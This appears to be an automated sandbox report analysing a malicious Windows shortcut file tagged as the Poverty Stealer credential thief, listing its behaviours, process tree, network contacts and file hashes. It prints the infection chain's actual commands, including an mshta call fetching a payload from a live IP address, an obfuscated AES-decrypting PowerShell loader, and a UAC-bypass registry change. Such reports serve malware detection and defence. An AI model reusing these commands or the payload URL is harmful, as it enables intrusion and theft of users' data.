Malware Analysis Report

2024-10-23 17:19

Sample ID 240305-cfhvqaca46
Target 05ef3c21d0ec7a856038e43c38032104948a535078649721b790548bf3260e28.lnk
SHA256 05ef3c21d0ec7a856038e43c38032104948a535078649721b790548bf3260e28
Tags
povertystealer evasion stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

05ef3c21d0ec7a856038e43c38032104948a535078649721b790548bf3260e28

Threat Level: Known bad

The file 05ef3c21d0ec7a856038e43c38032104948a535078649721b790548bf3260e28.lnk was found to be: Known bad.

Malicious Activity Summary

povertystealer evasion stealer trojan

UAC bypass

Poverty Stealer

Detect Poverty Stealer Payload

Downloads MZ/PE file

Blocklisted process makes network request

Loads dropped DLL

Executes dropped EXE

Checks computer location settings

Suspicious use of SetThreadContext

Drops file in Windows directory

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

Modifies Internet Explorer settings

Views/modifies file attributes

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-03-05 02:01

Signatures

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-03-05 02:01

Reported

2024-03-05 02:03

Platform

win10v2004-20240226-en

Max time kernel

149s

Max time network

157s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\05ef3c21d0ec7a856038e43c38032104948a535078649721b790548bf3260e28.lnk

Signatures

Detect Poverty Stealer Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Poverty Stealer

stealer povertystealer

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\system32\mshta.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Downloads MZ/PE file

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation C:\Windows\system32\cmd.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation C:\Windows\system32\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Roaming\Photoshop.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 628 set thread context of 1728 N/A C:\Users\Admin\AppData\Local\Temp\main\nmYIeCI7gcMH.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Vss\%AppData%\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3868 wrote to memory of 2276 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\forfiles.exe
PID 3868 wrote to memory of 2276 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\forfiles.exe
PID 2276 wrote to memory of 2444 N/A C:\Windows\System32\forfiles.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2276 wrote to memory of 2444 N/A C:\Windows\System32\forfiles.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2444 wrote to memory of 4704 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\mshta.exe
PID 2444 wrote to memory of 4704 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\mshta.exe
PID 4704 wrote to memory of 1828 N/A C:\Windows\system32\mshta.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4704 wrote to memory of 1828 N/A C:\Windows\system32\mshta.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1828 wrote to memory of 1044 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1828 wrote to memory of 1044 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1044 wrote to memory of 4088 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\Photoshop.exe
PID 1044 wrote to memory of 4088 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\Photoshop.exe
PID 1044 wrote to memory of 4088 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\Photoshop.exe
PID 4088 wrote to memory of 4964 N/A C:\Users\Admin\AppData\Roaming\Photoshop.exe C:\Windows\system32\cmd.exe
PID 4088 wrote to memory of 4964 N/A C:\Users\Admin\AppData\Roaming\Photoshop.exe C:\Windows\system32\cmd.exe
PID 4964 wrote to memory of 2916 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\mode.com
PID 4964 wrote to memory of 2916 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\mode.com
PID 4964 wrote to memory of 2300 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 4964 wrote to memory of 2300 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 4964 wrote to memory of 2100 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 4964 wrote to memory of 2100 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 4964 wrote to memory of 3680 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 4964 wrote to memory of 3680 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 4964 wrote to memory of 4340 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 4964 wrote to memory of 4340 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 4964 wrote to memory of 2404 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 4964 wrote to memory of 2404 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 4964 wrote to memory of 4712 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 4964 wrote to memory of 4712 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 4964 wrote to memory of 3672 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 4964 wrote to memory of 3672 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 4964 wrote to memory of 628 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\nmYIeCI7gcMH.exe
PID 4964 wrote to memory of 628 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\nmYIeCI7gcMH.exe
PID 4964 wrote to memory of 628 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\nmYIeCI7gcMH.exe
PID 628 wrote to memory of 1728 N/A C:\Users\Admin\AppData\Local\Temp\main\nmYIeCI7gcMH.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 628 wrote to memory of 1728 N/A C:\Users\Admin\AppData\Local\Temp\main\nmYIeCI7gcMH.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 628 wrote to memory of 1728 N/A C:\Users\Admin\AppData\Local\Temp\main\nmYIeCI7gcMH.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 628 wrote to memory of 1728 N/A C:\Users\Admin\AppData\Local\Temp\main\nmYIeCI7gcMH.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 628 wrote to memory of 1728 N/A C:\Users\Admin\AppData\Local\Temp\main\nmYIeCI7gcMH.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\05ef3c21d0ec7a856038e43c38032104948a535078649721b790548bf3260e28.lnk

C:\Windows\System32\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p C:\Windows\Vss /c "powershell start mshta http://91.92.251.35/Downloads/Ten/photoshop

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

start mshta http://91.92.251.35/Downloads/Ten/photoshop

C:\Windows\system32\mshta.exe

"C:\Windows\system32\mshta.exe" http://91.92.251.35/Downloads/Ten/photoshop

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ivXRRY = 'AAAAAAAAAAAAAAAAAAAAAHuMmso1AMeYPTqg2zmFYGLRAevBF0dzIBqwjcA2oQ2m8+KngkChOWPmpzxbUmz9iES2+wmHBDF4NNikX/9SA+8RZl3cvQDF00jQ0YmFtDKSgyA9b4/phWWKAp1Dd8/ytR6dOWK+gl5jA/RW80HrzF8zwxTzeNjzEdYIbAKbgIvUzpdq1PfpNgSDcrLwnf6wYoWXaDo+4f2SPpaJvd5bWGTy1EJj8FAnhAlSK/pbposi/hrdUPIRQvxHXKQQXZlr5NrPpLbhHHu78ydc6wwTCvZk77DaGi39y5qB230ZYk/e7tV27V3q01tqCxdx3tBcSKA7uAMyX8Ey/mjlsAOXbJ57iEolFiQtMkeLXRQnHlGQAom0cfG+TD7Cm01qvC5pMEeNJbLbciSdu9xs9T+c7tPx+xBYuPOvZFzYMN57JaeaZXehvSTkRY2hC6KnLkyRSwtTIKg1U8Ib7rr08szQWfdMaxRKVj3PGI/wQuxJ+WJA8tcTFqvoG6e88+mNmfdwt98gTMZWjCMtvnf4CBc92ueyM5vs56/2u+UVEJzepZUpK8lTTQTWjY1hlOFe0emGmyht+KS1zFSwWZBbRyNt0o5Dy9xG4GYyKw+ZUF5kF4SxYX6Yv7NLLkRJ1zA1vynUhhQD0GSeGUgNQ+quSJnyFSiEdpEa8NFWaep0COP5xyMiCOqi/EypECYLwCKEOwNqBqZ0/BjRXs3On8DJzDn994w83i+XNhIcnKswDJ1rV9Alxlwmt19nbz+Dn58l/ZcLWwvS6I+mTp8UBEk0CSxgzPNb8mX3rVtEvxZVuhLJa7/XWLcWSIGEtaXWpgRM/SbMXkdj7MO7V+BRMP1qf/dcU/TUhY1lotTnnHCHRFeLb1d1';$ftUus = 'ckRTZUh1VlFmVnlTa2luUmVGS3hIRGlVRktJVGF1aEI=';$qOFHjUF = New-Object 'System.Security.Cryptography.AesManaged';$qOFHjUF.Mode = [System.Security.Cryptography.CipherMode]::ECB;$qOFHjUF.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$qOFHjUF.BlockSize = 128;$qOFHjUF.KeySize = 256;$qOFHjUF.Key = [System.Convert]::FromBase64String($ftUus);$svgDF = [System.Convert]::FromBase64String($ivXRRY);$JuzxcfzI = $svgDF[0..15];$qOFHjUF.IV = $JuzxcfzI;$ceTYAICRx = $qOFHjUF.CreateDecryptor();$SsqoZtLKt = $ceTYAICRx.TransformFinalBlock($svgDF, 16, $svgDF.Length - 16);$qOFHjUF.Dispose();$JFlSsSI = New-Object System.IO.MemoryStream( , $SsqoZtLKt );$wBZvtko = New-Object System.IO.MemoryStream;$pFgGcVXpX = New-Object System.IO.Compression.GzipStream $JFlSsSI, ([IO.Compression.CompressionMode]::Decompress);$pFgGcVXpX.CopyTo( $wBZvtko );$pFgGcVXpX.Close();$JFlSsSI.Close();[byte[]] $xIpqeQj = $wBZvtko.ToArray();$BomjpubV = [System.Text.Encoding]::UTF8.GetString($xIpqeQj);$BomjpubV | powershell -

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -

C:\Users\Admin\AppData\Roaming\Photoshop.exe

"C:\Users\Admin\AppData\Roaming\Photoshop.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=1408 --field-trial-handle=2744,i,16362475727591565961,3676688664819797550,262144 --variations-seed-version /prefetch:8

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"

C:\Windows\system32\mode.com

mode 65,10

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e file.zip -p125762329330388294023250819845 -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_5.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_4.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_3.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_2.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_1.zip -oextracted

C:\Windows\system32\attrib.exe

attrib +H "nmYIeCI7gcMH.exe"

C:\Users\Admin\AppData\Local\Temp\main\nmYIeCI7gcMH.exe

"nmYIeCI7gcMH.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 73.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 241.154.82.20.in-addr.arpa udp
US 8.8.8.8:53 194.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
NL 91.92.251.35:80 91.92.251.35 tcp
US 8.8.8.8:53 35.251.92.91.in-addr.arpa udp
US 8.8.8.8:53 41.110.16.96.in-addr.arpa udp
GB 172.217.169.74:443 tcp
US 8.8.8.8:53 180.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.200:443 g.bing.com tcp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 200.197.79.204.in-addr.arpa udp
NL 91.92.251.35:80 91.92.251.35 tcp
US 8.8.8.8:53 74.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 13.107.253.64:443 tcp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 18.134.221.88.in-addr.arpa udp
US 8.8.8.8:53 209.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 joxi.net udp
US 104.21.73.118:80 joxi.net tcp
US 104.21.73.118:443 joxi.net tcp
US 8.8.8.8:53 118.73.21.104.in-addr.arpa udp
US 8.8.8.8:53 227.16.217.172.in-addr.arpa udp
US 8.8.8.8:53 55.36.223.20.in-addr.arpa udp
US 8.8.8.8:53 104.193.132.51.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_s345blvh.btk.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2444-9-0x000001D3FE2F0000-0x000001D3FE312000-memory.dmp

memory/2444-12-0x00007FF82CFB0000-0x00007FF82DA71000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 d85ba6ff808d9e5444a4b369f5bc2730
SHA1 31aa9d96590fff6981b315e0b391b575e4c0804a
SHA256 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA512 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 e924b42def82a0dc711ba227d46b2328
SHA1 9b4f97aa90f59f3647b3f4e419f6195ff0ed34fd
SHA256 5d2fcee8c6d15b34beb556f98700e4e8f207a06ba3e28efe7bc1f34784280623
SHA512 f8c58207a8b8d9cfa8b190156aa24ee0ac908a2bc4a2d8f742b14a00f05bae88ac2b5fc5b5d20924e8f6ed98e277f16f93982c266926d670511fa4171426cbdc

memory/1828-29-0x000002522BA70000-0x000002522C531000-memory.dmp

memory/1828-30-0x0000025244840000-0x0000025244850000-memory.dmp

memory/1828-32-0x0000025244840000-0x0000025244850000-memory.dmp

memory/1828-31-0x0000025244840000-0x0000025244850000-memory.dmp

memory/2444-33-0x00007FF82CFB0000-0x00007FF82DA71000-memory.dmp

memory/1044-44-0x000001E6825A0000-0x000001E6825B0000-memory.dmp

memory/1044-43-0x00007FF82A4A0000-0x00007FF82AF61000-memory.dmp

memory/1044-45-0x000001E6825A0000-0x000001E6825B0000-memory.dmp

memory/1044-46-0x000001E6825A0000-0x000001E6825B0000-memory.dmp

memory/1044-47-0x000001E69AF90000-0x000001E69AFD4000-memory.dmp

memory/1044-48-0x000001E69B060000-0x000001E69B0D6000-memory.dmp

memory/1828-49-0x000002522BA70000-0x000002522C531000-memory.dmp

memory/1828-50-0x000002522BA70000-0x000002522C531000-memory.dmp

memory/1828-53-0x0000025244840000-0x0000025244850000-memory.dmp

memory/1828-54-0x0000025244840000-0x0000025244850000-memory.dmp

memory/1828-55-0x0000025244840000-0x0000025244850000-memory.dmp

memory/1044-56-0x00007FF82A4A0000-0x00007FF82AF61000-memory.dmp

C:\Users\Admin\AppData\Roaming\Photoshop.exe

MD5 7b4b426a17e54627a6ee78305249508c
SHA1 541889fd220c467a78a6e41c385e3646f09d2544
SHA256 bb48d0fa09c72b3e019c19308b38337f96549787815be71faa9f5aa6243fb041
SHA512 4bb6a902498eca598bfbb6eb4e0baa90e0c3560687decb58d5e73f987bb96e3901290a92152d75aa97216833e78547b75086e7358d8e212ab677f6efcd87e053

C:\Users\Admin\AppData\Roaming\Photoshop.exe

MD5 a8048bd6fc7d336d7f6e0fd6800da673
SHA1 f28db14f2884ac1db0ce53a7ec7bee572541d902
SHA256 d7414d6e34052bd4194ebf979a405af4e0d39b42b6d4d6ad31db85fd78dcc31d
SHA512 570d1ac52dcb8f6c67983a4af99fece9f47e03beba83b9b2c95ce544f5b5f40c8c7e46019f5e106b258de2affee91988053dbab9e777e1c115d3803513eea066

C:\Users\Admin\AppData\Roaming\Photoshop.exe

MD5 e2220ef23d62310b8fb49798558fc356
SHA1 22eda8e818e6abb5deb1176a8caf5b0647d57a6b
SHA256 6986d8faa363cc3adf4c6fc84ebb30361568b17267a79739f69941860481b78e
SHA512 c169c76a87130072e9dfade83ccde4774091a1f8207b4190bb6daf4dc05483b6532eb4f5b0e04e26e9d6bd12e3ff88a79ab335b2a1871f28434ea3594b076930

memory/1044-69-0x00007FF82A4A0000-0x00007FF82AF61000-memory.dmp

memory/1828-71-0x000002522BA70000-0x000002522C531000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\main\main.bat

MD5 12b875e85a885c81bc04161e9df9151a
SHA1 7d9e32a575e487611abb182b4d89b1ab4f4e7a06
SHA256 97e80e083ba83a031bb03097cd81d86708165cd7eb1c070782e6a7234de784a5
SHA512 3ba38a4024287bcaeee208a1c0158fae73a86d5581cf566309985bbd204e810eb5fd099a1816a9326c9e25bb08a2da20f2a4884978eb4e4ed8a3762c1057d0ca

C:\Users\Admin\AppData\Local\Temp\main\file.bin

MD5 984b78026a296c4b0cc20f30ed30a8a1
SHA1 9ebe2b22c4e25edc0aa5370287864c2fc3bd5920
SHA256 134e1b42d291f2b242432c4ad18679572924b476c651285c93b8981ed5b93235
SHA512 ed2d5f81c90232a73bace1782b377cf070a16655ae9f86ca9e1659c6075132e4222c00a645b76aa10f1d63cc6cc07949c41254b6ef6c880b5448d01b9268e654

C:\Users\Admin\AppData\Local\Temp\main\7z.dll

MD5 349dfa0f7c4f22d67f27a9abe8778c86
SHA1 4f5c8367f9b2292f5b7dc73bd4bdb4c022736e2f
SHA256 16833c81c35fbac25e4c806f04617b944fbdaa466d251f08e4dff718a6412be5
SHA512 3feb371de3c93136699b2f28b95845b468698a1d545892b6adc046c1454795e5a69acdc78c2f5a1135ec39a625297c374234df47089a928997d07c9cfa000497

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

MD5 619f7135621b50fd1900ff24aade1524
SHA1 6c7ea8bbd435163ae3945cbef30ef6b9872a4591
SHA256 344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2
SHA512 2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

C:\Users\Admin\AppData\Local\Temp\main\7z.dll

MD5 876132fb73099103c8136040396737ca
SHA1 1d1f3e3cf995ac7824307a405b6083f640e4e33c
SHA256 74ae2ec6f985cb2cf898a69c112f875bf93fc04621135aea029979abb3874b11
SHA512 c96e67248ac8c7886050a8f8538af09cfabeb0ac1d66980af9a6a67b1ceb7a6b9e86cae1af4743c07d9b68c88a4e698a98caa61ff85296f6726dd6cc996c3025

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

MD5 6cc2169083ae7a827b301871a41c30e8
SHA1 9acdaf07f63ccfd6ded504ae1a8d4a0a7652248d
SHA256 367a10c0aac6e7bb56246c3f48e0a54be5f9deae4870c2d0bcac473faca7f2fa
SHA512 20b5a54476dc7d18a2f2e338f86c092cf86a81f0cb2b62cb338b83820899428a78a4ccc1977b07c7be07be925477e54243868ec528a6e88bb6f92f0c758d9358

C:\Users\Admin\AppData\Local\Temp\main\7z.dll

MD5 42d38af6d6bb7757a2af8662376fa9ec
SHA1 128fa41b77bfe1eaf114a423db780046b262dbb3
SHA256 57bc39dfecc8ca1a5986129249dadb967fd59227d699bc7f323d86fbdb0da8b5
SHA512 74c71cc04d1a4cdb162122c3b4117ff6c4ea54f906400512430d881c97837b65f16bae8227c88326e3fc455ad548205c82cd120fc1ff8780412a1889d1ca7b08

C:\Users\Admin\AppData\Local\Temp\main\extracted\file_5.zip

MD5 91bb7523f03ef9b567ea4fa972f92f68
SHA1 9d2b617137b41a8bf909f2f4fe43ba5159747594
SHA256 6fc67ba15759433a63eb34082a41be80394cdbad2b9a11934841227133ea62d6
SHA512 7de69c574c312a46f17eadd2b80e8ff4206cd5c8c9a2f68ef18e867476053ed797ee583bbe2a28d9df13eb347de78f1bfc174f26235f522bb55da93b03933c11

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

MD5 f2bc75260c4dc6340e19b086f275f23b
SHA1 1d6776e6b83fa5096bb509065a1895b53d244e5a
SHA256 779b54cb84e03c5c29618fc2a67b74e9b22c276e9e51c64940711c3463fea6a9
SHA512 80e315dd87afff5846a565898168975a5d3dc85aecef70acd2e441dc90186a12c7618e245452ea159d15763d028df9d90abd197d6bff65c011c2602e38513eb5

C:\Users\Admin\AppData\Local\Temp\main\7z.dll

MD5 84dce6930241fbf55e8e49825151cbe0
SHA1 ab2292208d4f88b58e9d09afbf3efd8ac1fc25aa
SHA256 e9ae6f0cb6cf16e888820bec8a7789a450b04b223c680b72bd23b6a836d755f2
SHA512 7abebca387f9242b33ea5d685d545d7f393e6247913ebe3d69a40e35335351fdaa401568834c1f47f3c7694e289e5573bccfd7df869e2d107ecec66d865df8a4

C:\Users\Admin\AppData\Local\Temp\main\extracted\file_4.zip

MD5 f8e37275ce0eacb18f03972f25e95ed0
SHA1 f2e7be3d5387e5a862717f73a2453d5357f11b15
SHA256 3cbde6d0d924ce8379e07338017cbd3a38dbebaed78ed7f8ccf9b77a650739fc
SHA512 8498058a38f5c349d5e0deca8efcba55b472aa1e3f538d415130c33f0ff1d3c569ef4987deb52312f93d6d1cb68fcd155f62e025ef325b49520a15e2b4e4dfa4

C:\Users\Admin\AppData\Local\Temp\main\7z.dll

MD5 675407d2ece4c9224e725734b55f422e
SHA1 6a6016d63e1b82726840dfcc24249e635b4a966d
SHA256 753eaa0f80e614e4e8bc83968904b1460f44070c97986c7a8ba6cdbd8030d70d
SHA512 eaafb12eeed2a1e5157b92f2e8a175f46db78c0a0018baf4b6ed8a33d807e3dd8ab658fb4bdc5fba15f0fb5b21bd0aae43eec55848c045bbb84683700374f577

C:\Users\Admin\AppData\Local\Temp\main\extracted\file_3.zip

MD5 b0ee41dbf2f08951c13569cb754a532a
SHA1 745aebfc11e334ef125efdb33330b75d9eab2919
SHA256 d483b4b71895255dfea5b99406626b1599d3850f823f8d285e28e70006b96b54
SHA512 aee14efeaa1f197416b6b119dd132f733d661ca01a8d585c9c70ff1743f876db1fefeeacab5d2857ab0d1f29029331fa3a2e27bed2af50dbb8db9bcc01183c59

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

MD5 db00b7f319494869fa521602dca18e7e
SHA1 1209ae2a93c3df5646bce2e4966bab908068b72c
SHA256 8f03191124969b14ccfae574aeb717666143ab51a14672552755b528043bd305
SHA512 45c7d844360d305a74243ee6f59850aacb99cd64d2ffc8912f6ac44907feb69a33e0f58cc7f94dc3ee582083ce9911b96d10f58afc3e448416fe3cc2f530c6d0

C:\Users\Admin\AppData\Local\Temp\main\extracted\file_1.zip

MD5 5f79b89dbaf23387caa818b0da7b8ea2
SHA1 3c38d94819331fd551c07048841cfe6ecbf29e18
SHA256 7abc58d9dd3dee48f88629c8dcaf12e72a337f8bf1dbce59d464ab6ed698b726
